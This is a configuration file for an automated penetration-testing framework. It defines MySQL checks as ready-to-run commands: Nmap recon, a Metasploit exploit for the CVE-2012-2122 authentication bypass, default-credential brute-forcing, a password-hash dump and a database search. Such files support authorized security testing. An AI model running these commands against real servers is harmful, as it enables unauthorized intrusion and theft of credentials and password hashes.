#########################################################################################
# MySQL Settings
#########################################################################################

[config]
default_port = 3306
protocol	 = tcp
categories 	 = recon, exploit, bruteforce, postexploit


#########################################################################################
# Recon
#########################################################################################
[check_nmap-recon]
name        = nmap-recon
category    = recon
description = Recon using Nmap MySQL scripts
tool        = nmap
command_1   = sudo nmap -sT -sV -Pn -vv -p [PORT] --script='mysql-enum,mysql-info,mysql-vuln-*' --stats-every 10s [IP]


#########################################################################################
# Exploit
#########################################################################################
[check_mysql-auth-bypass-cve2012-2122]
name        = mysql-auth-bypass-cve2012-2122
category    = exploit
description = Exploit password bypass vulnerability in MySQL - CVE-2012-2122
tool        = metasploit
command_1   = sudo msfconsole -q -x "use scanner/mysql/mysql_authbypass_hashdump; set RHOSTS [IP]; set RPORT [PORT]; set VERBOSE true; run; exit"


#########################################################################################
# Bruteforce
#########################################################################################
[check_default-creds]
name        = default-creds
category    = bruteforce
description = Check default credentials on MySQL server
tool        = patator
command_1   = python2.7 patator.py mysql_login host=[IP] port=[PORT] user=COMBO00 password=COMBO01 0=[WORDLISTSDIR]/services/mysql/mysql_combo.txt -x ignore:fgrep='Access denied for user'
postrun     = patator_valid_creds


#########################################################################################
# Post-exploit
#########################################################################################
[check_mysql-hashdump]
name        = mysql-hashdump
category    = postexploit
description = Retrieve usernames and password hashes from MySQL database (req. creds)
tool        = metasploit
command_1   = sudo msfconsole -q -x "use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS [IP]; set RPORT [PORT]; set USERNAME [USERNAME]; set PASSWORD '[PASSWORD]'; set VERBOSE true; run; exit"
context_1   = { 'auth_status': POST_AUTH }

[check_mysql-interesting-tables-columns]
name        = mysql-interesting-tables-columns
category    = postexploit
description = Search for interesting tables and columns in database
tool        = jok3r-scripts
command_1   = python3 mysql_search.py -H [IP] -P [PORT] -u [USERNAME] -p '[PASSWORD]'